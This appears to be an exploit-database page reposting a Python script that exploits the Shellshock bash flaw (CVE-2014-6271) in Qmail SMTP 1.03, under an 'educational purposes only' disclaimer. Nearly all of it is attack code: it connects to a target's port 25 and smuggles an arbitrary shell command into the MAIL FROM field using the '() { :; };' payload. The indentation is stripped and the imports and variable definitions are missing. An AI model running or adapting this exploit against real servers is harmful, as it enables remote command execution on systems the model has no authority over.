Exploits / Vulnerability Discovered : 2020-07-08 |
Type : remote |
Platform : multiple
This exploit / vulnerability Qmail smtp 1.03 bash environment variable injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
# Date: 2020-07-03
# Exploit Author: 1F98D
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
# Version: Qmail 1.03
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2014-6271
# References:
# http://seclists.org/oss-sec/2014/q3/649
# https://lists.gt.net/qmail/users/138578
#
# Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
# in the MAIL FROM field.
#
#!/usr/local/bin/python3
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 25))
res = s.recv(1024)
if 'ESMTP' not in str(res):
print('[!] No ESMTP detected')
print('[!] Received {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] ESMTP detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error connecting, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Connected, sending payload')
s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error sending payload, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)